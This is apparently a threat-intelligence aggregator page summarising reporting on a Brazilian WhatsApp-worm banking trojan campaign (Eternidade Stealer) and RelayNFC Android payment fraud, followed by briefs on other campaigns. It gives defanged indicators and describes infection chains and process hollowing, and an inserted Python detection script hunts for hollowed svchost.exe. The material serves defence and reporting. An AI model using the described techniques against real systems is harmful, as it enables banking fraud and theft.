- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- The campaign's backend was traced to several related domains and panels used for redirect management and victim tracking.
  First reported: 19.11.2025 17:00 · 2 sources, 2 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- Logs showed 454 connection attempts from 38 countries, with only a handful originating in Brazil, despite the malware's regional focus.
  First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
- Most visitors used desktop systems, suggesting that the campaign was designed for workstation environments rather than mobile endpoints.
  First reported: 19.11.2025 17:00 · 2 sources, 3 articles. Sources:
- Eternidade Stealer Trojan Fuels Aggressive Brazil Cybercrime — www.infosecurity-magazine.com — 19.11.2025 17:00
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The campaign leverages a combination of social engineering and WhatsApp hijacking to distribute a Delphi-based banking trojan named Eternidade Stealer.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The malware uses an obfuscated Visual Basic Script, which drops a batch script that delivers two payloads: a Python script for WhatsApp Web-based dissemination and an MSI installer for Eternidade Stealer.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The Python script establishes communication with a remote server and uses WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The malware harvests a victim's entire contact list, filtering out groups, business contacts, and broadcast lists, and sends a malicious attachment to all contacts.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The MSI installer drops several payloads, including an AutoIt script that checks if the compromised system is based in Brazil by inspecting the operating system language.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The script scans running processes and registry keys to ascertain the presence of installed security products and profiles the machine, sending details to a C2 server.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The malware injects the Eternidade Stealer payload into 'svchost.exe' using process hollowing.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
Eternidade Stealer continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The malware uses a terra.com[.]br email address to fetch C2 details, mirroring a tactic recently adopted by Water Saci.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The campaign's backend was traced to two panels, one for managing the Redirector System and another login panel, used to monitor infected hosts.
First reported: 19.11.2025 17:35 (1 source, 2 articles)
- Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices — thehackernews.com — 19.11.2025 17:35
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The threat actor Water Saci is using a sophisticated, highly layered infection chain that uses HTML Application (HTA) files and PDFs to propagate a worm that deploys a banking trojan via WhatsApp in attacks targeting users in Brazil.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The latest wave is characterized by the attackers shifting from PowerShell to a Python-based variant that spreads the malware in a worm-like manner over WhatsApp Web.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The PDF lure instructs victims to update Adobe Reader by clicking on an embedded link.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
Users who receive HTA files are deceived into executing a Visual Basic Script immediately upon opening, which then runs PowerShell commands to fetch two next-stage payloads from a remote server: an MSI installer for the trojan and a Python script responsible for spreading the malware via WhatsApp Web.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The MSI installer serves as a conduit for delivering the banking trojan using an AutoIt script. The script also runs checks to ensure that only one instance of the trojan is running at any given point of time.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The script verifies the presence of a marker file named "executed.dat." If it does not exist, the script creates the file and notifies an attacker-controlled server ("manoelimoveiscaioba[.]com").
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The script analyzes the user's Google Chrome browsing history to search for visits to banking websites, specifically a hard-coded list comprising Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The script then proceeds to another critical reconnaissance step that involves checking for installed antivirus and security software, as well as harvesting detailed system metadata.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The main functionality of the malware is to monitor open windows and extract their window titles to compare them against a list of banks, payment platforms, exchanges, and cryptocurrency wallets.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
If any of these windows contain keywords related to targeted entities, the script looks for a TDA file dropped by the installer and decrypts and injects it into a hollowed "svchost.exe" process, following which the loader searches for an additional DMP file containing the banking trojan.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
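A host-based hunting heuristic a defender could run over process-creation telemetry to surface the hollowed svchost.exe described above (a hollowed host process typically shows an unexpected parent and lacks the `-k <service group>` argument a real service host always carries). This is an added example, not code from the sources or from the malware; the Sysmon-style event fields, the parent allowlist and the sample events are constructed assumptions.

```python
"""Hunt for svchost.exe starts that look like process hollowing targets.

Added example: the event shape mirrors Sysmon Event ID 1 (ProcessCreate) fields,
but the records below are constructed, not captured from a real host.
"""
from dataclasses import dataclass
import ntpath


@dataclass
class ProcessCreate:
    """Minimal process-creation record (constructed, Sysmon-style field names)."""
    image: str          # full path of the new process
    command_line: str   # command line as logged
    parent_image: str   # full path of the parent process


# Parents that legitimately start svchost.exe. services.exe is the normal one;
# the rest are common benign exceptions. Assumption: tune to your environment.
EXPECTED_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "svchost.exe"}

# Genuine svchost.exe lives only in these directories.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _basename(path: str) -> str:
    """Case-folded file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def assess_svchost(ev: ProcessCreate) -> list[str]:
    """Return the reasons an svchost.exe start looks hollowed; [] if it looks normal.

    Non-svchost events are ignored (empty list) so the function can be mapped
    over a whole telemetry stream.
    """
    if _basename(ev.image) != "svchost.exe":
        return []
    reasons: list[str] = []
    if not ev.image.lower().startswith(SYSTEM_DIRS):
        reasons.append("image outside System32/SysWOW64")
    parent = _basename(ev.parent_image)
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent {parent}")
    # A real service host is always started as "svchost.exe -k <group> ...";
    # a hollowed copy spawned by a loader usually has no arguments at all.
    args = ev.command_line.split()
    if "-k" not in args[1:]:
        reasons.append("missing -k <service group> argument")
    return reasons


def hunt(events: list[ProcessCreate]) -> list[tuple[str, list[str]]]:
    """Return (parent basename, reasons) for every svchost.exe start that was flagged."""
    hits = []
    for ev in events:
        reasons = assess_svchost(ev)
        if reasons:
            hits.append((_basename(ev.parent_image), reasons))
    return hits


# Constructed sample events: one benign service host, two hollowing candidates.
LEGIT = ProcessCreate(
    image=r"C:\Windows\System32\svchost.exe",
    command_line=r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
    parent_image=r"C:\Windows\System32\services.exe",
)
HOLLOWED = ProcessCreate(  # AutoIt-interpreter parent and no -k, as a loader would produce
    image=r"C:\Windows\System32\svchost.exe",
    command_line=r"C:\Windows\System32\svchost.exe",
    parent_image=r"C:\Users\victim\AppData\Local\Temp\AutoIt3.exe",  # hypothetical path
)
WRONG_PARENT = ProcessCreate(  # arguments look right, but explorer.exe is not a service manager
    image=r"C:\Windows\System32\svchost.exe",
    command_line=r"C:\Windows\System32\svchost.exe -k netsvcs",
    parent_image=r"C:\Windows\explorer.exe",
)
SAMPLE_EVENTS = [LEGIT, HOLLOWED, WRONG_PARENT]

if __name__ == "__main__":
    for parent, reasons in hunt(SAMPLE_EVENTS):
        print(f"svchost.exe from {parent}: {'; '.join(reasons)}")
```

The same two checks can be expressed as a SIEM query over real Sysmon or EDR process events; the allowlist is the part that needs tuning before alerting on it.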
The banking trojan deployed is not Maverick, but rather a malware that exhibits structural and behavioral continuity with Casbaneiro.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The trojan carries out "aggressive" anti-virtualization checks to sidestep analysis and detection, and gathers host information through Windows Management Instrumentation (WMI) queries.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The trojan makes Registry modifications to set up persistence and establishes contact with a C2 server ("serverseistemasatu[.]com") to send the collected details and receive backdoor commands that grant remote control over the infected system.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The trojan forcibly terminates several browsers to force victims to reopen banking sites under "attacker-controlled conditions."
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The second aspect of the campaign is the use of a Python script, an enhanced version of its PowerShell predecessor, to enable malware delivery to every contact via WhatsApp Web sessions using the Selenium browser automation tool.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
There is "compelling" evidence to suggest that Water Saci may have used a large language model (LLM) or code-translation tool to port their propagation script from PowerShell to Python, given the functional similarities between the two versions and the inclusion of emojis in console outputs.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The development comes as Brazilian banking users are also being targeted by a previously undocumented Android malware dubbed RelayNFC that's designed to carry out Near-Field Communication (NFC) relay attacks and siphon contactless payment data.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
RelayNFC implements a full real-time APDU relay channel, allowing attackers to complete transactions as though the victim's card were physically present.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The malware is built using React Native and Hermes bytecode, which complicates static analysis and helps evade detection.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
Primarily spread via phishing, the attack makes use of decoy Portuguese-language sites (e.g., "maisseguraca[.]site") to trick users into installing the malware under the pretext of securing their payment cards.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The end goal of the campaign is to capture the victim's card details and relay them to attackers, who can then perform fraudulent transactions using the stolen data.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
-
The cybersecurity company said its investigation also uncovered a separate phishing site ("test.ikotech[.]online") that distributes an APK file with a partial implementation of Host Card Emulation (HCE), indicating that the threat actors are experimenting with different NFC relay techniques.
First reported: 03.12.2025 17:32 (1 source, 1 article)
- Brazil Hit by Banking Trojan Spread via WhatsApp Worm and RelayNFC NFC Relay Fraud — thehackernews.com — 03.12.2025 17:32
Similar Happenings
Chinese State-Sponsored Group Exploits Windows Zero-Day in Espionage Campaign Against European Diplomats
A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems. The attacks have broadened in scope to include diplomatic entities from Italy and the Netherlands. The zero-day vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data. Microsoft has not yet released a patch for this vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the vulnerability by changing LNK files in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch to limit shortcut target strings to 260 characters and warn users about potential dangers.
Russian Sandworm Group Targets Ukrainian Organizations with Data-Wiping Malware and LotL Tactics
Russian threat actors, specifically the Sandworm group, have targeted Ukrainian organizations, including a business services firm, a local government entity, and the grain sector, using living-off-the-land (LotL) tactics and dual-use tools to maintain persistent access and exfiltrate sensitive data. The attacks, which began in June 2025, involved minimal malware to reduce detection and included the use of web shells and legitimate tools for reconnaissance and data theft. The threat actors exploited unpatched vulnerabilities to deploy web shells on public-facing servers, gaining initial access. They then used various tactics, including PowerShell commands, scheduled tasks, and legitimate software, to evade detection and perform reconnaissance. The attacks were characterized by the use of legitimate tools and minimal malware, demonstrating the actors' deep knowledge of Windows native tools. In addition to LotL tactics, Sandworm deployed multiple data-wiping malware families in June and September 2025, targeting Ukraine's education, government, and grain sectors. The grain sector, a vital economic sector, was targeted to disrupt Ukraine's war economy. The data-wiping malware used included ZeroLot and Sting, with initial access achieved by UAC-0099, who then transferred access to APT44 for wiper deployment. The activity is confirmed to be of Russian origin, with specific attribution to the Sandworm group. A new Russia-aligned threat activity cluster, InedibleOchotense, impersonated ESET in phishing attacks targeting Ukrainian entities starting in May 2025. This campaign involved sending spear-phishing emails and Signal text messages containing links to trojanized ESET installers, which delivered the Kalambur backdoor. InedibleOchotense is linked to the Sandworm (APT44) hacking group and has been observed conducting destructive campaigns in Ukraine, including the deployment of wiper malware ZEROLOT and Sting. 
Another Russia-aligned threat actor, RomCom, launched spear-phishing campaigns in mid-July 2025 exploiting a WinRAR vulnerability (CVE-2025-8088) targeting various sectors in Europe and Canada. RomCom also targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. The targeted entity had worked for a city with close ties to Ukraine in the past. The ESET report noted that other Russian-aligned APT groups also maintained their focus on Ukraine and countries with strategic ties to Ukraine, while also expanding their operations to European entities. Gamaredon remained the most active APT group targeting Ukraine, with a noticeable increase in intensity and frequency of its operations during the reported period. Gamaredon selectively deployed one of Turla’s backdoors, indicating a rare instance of cooperation between Russia-aligned APT groups. Gamaredon’s toolset continued to evolve, incorporating new file stealers or tunneling services.
Herodotus Android malware evades detection with human-like typing
A new Android malware family, Herodotus, uses random typing delays to mimic human behavior and evade detection by security software. The malware is offered as a service to financially motivated cybercriminals and is currently targeting Italian and Brazilian users through SMS phishing. Herodotus bypasses Accessibility permission restrictions in Android 13 and later, allowing it to interact with the user interface and steal sensitive information. The malware includes a 'humanizer' mechanism that introduces random delays in text input to avoid detection by behavioral anti-fraud solutions. It also features a control panel for custom SMS texts, overlay pages for credential theft, and SMS stealing for two-factor authentication interception. Herodotus is spread by multiple threat actors, with seven distinct subdomains detected. The malware is under active development and targets financial organizations in the U.S., Turkey, the U.K., and Poland, along with cryptocurrency wallets and exchanges. It is designed to perform device takeover (DTO) attacks and can steal two-factor authentication (2FA) codes sent via SMS, intercept screen content, grab the lockscreen PIN or pattern, and install remote APK files.
Flax Typhoon APT Group Exploits ArcGIS for Persistent Access
The Flax Typhoon APT group, also tracked as Ethereal Panda and RedJuliett, exploited a legitimate ArcGIS application to establish a persistent backdoor for over a year. The attack involved modifying the ArcGIS server’s Java server object extension (SOE) to function as a web shell, enabling command execution, lateral movement, and data exfiltration. The malicious SOE persisted even after remediation and patching, highlighting the need for proactive threat hunting and treating all public-facing applications as high-risk assets. The group targeted a public-facing ArcGIS server connected to an internal server, compromising a portal administrator account and deploying a malicious SOE. They used a base64-encoded payload and a hardcoded key to execute commands and upload a renamed SoftEther VPN executable for long-term access. The attack targeted IT staff workstations within the scanned subnet, demonstrating the potential for significant operational disruption and data exposure. The attackers used a public-facing ArcGIS server connected to a private, internal ArcGIS server for backend computations, a common default configuration. They sent disguised commands to the portal server, creating a hidden system directory that became Flax Typhoon's private workspace. The attackers ensured the compromised component was included in system backups, turning the organization's own recovery plan into a guaranteed method of reinfection. ReliaQuest worked with the customer organization and Esri to fully evict Flax Typhoon actors from the environment, which included rebuilding the entire server stack and deploying custom detections for the threat activity. ReliaQuest urged organizations to treat all public-facing applications as high-risk assets and recommended security teams audit and harden such applications. The researchers also highlighted the need for behavioral analytics to complement signature-based detection, as Flax Typhoon did not use any malware or known malicious files. 
Strong credential hygiene was emphasized, noting that a weak administrator password gave the attackers a foothold in the organization's network. ReliaQuest recommended implementing multifactor authentication and practicing the principle of least privilege to enhance security. The ArcGIS geographic information system (GIS) is developed by Esri and supports server object extensions (SOE) that can extend basic functionality. The software is used by municipalities, utilities, and infrastructure operators to manage spatial and geographic data through maps. Researchers at cybersecurity company ReliaQuest have moderate confidence that the threat actor is Flax Typhoon. The attackers used valid administrator credentials to log into a public-facing ArcGIS server linked to a private, internal ArcGIS server. The malicious SOE accepted base64-encoded commands through a REST API parameter (layer) and executed them on the internal ArcGIS server. The exchange was protected by a hardcoded secret key, ensuring only the attackers had access to this backdoor. The attackers downloaded and installed SoftEther VPN Bridge, registering it as a Windows service that started automatically. The VPN established an outbound HTTPS tunnel to the attacker's server at 172.86.113[.]142, linking the victim's internal network to the threat actor's machine. The VPN used normal HTTPS traffic on port 443, blending with legitimate traffic, and remained active even if the SOE was detected and deleted. The attackers scanned the local network, moved laterally, accessed internal hosts, dumped credentials, or exfiltrated data using the VPN connection. The attackers targeted two workstations belonging to the target organization's IT staff, attempting to dump the Security Account Manager (SAM) database, security registry keys, and LSA secrets. Flax Typhoon is known for espionage campaigns to establish long-term, stealthy access through legitimate software. 
The FBI linked Flax Typhoon to the massive "Raptor Train" botnet, impacting the U.S. The Treasury's Office of Foreign Assets Control (OFAC) sanctioned companies that supported the state-sponsored hackers. Esri confirmed this is the first time an SOE has been used this way and will update their documentation to warn users of the risk of malicious SOEs. The attackers used the JavaSimpleRESTSOE ArcGIS extension to invoke a REST operation to run commands on the internal server via the public portal. The attackers specifically targeted two workstations belonging to IT personnel to obtain credentials and further burrow into the network. The attackers reset the password of the administrative account.
TA585 Using MonsterV2 in Phishing Campaigns
TA585, a sophisticated threat actor, has been actively delivering the MonsterV2 malware via phishing campaigns since February 2025. The group manages its own infrastructure and employs multiple delivery techniques, including IRS and SBA-themed lures, malicious JavaScript injections, and fake CAPTCHA verifications. MonsterV2, also known as Aurotun Stealer, is a versatile malware capable of stealing sensitive data, acting as a clipper, establishing remote control, and executing commands from a C2 server. The malware is sold by a Russian-speaking actor and is typically packed using a C++ crypter called SonicCrypt to evade detection. TA585's campaigns have also included GitHub-themed lures and the distribution of other malware, such as Rhadamanthys. MonsterV2 avoids infecting systems in Commonwealth of Independent States (CIS) countries.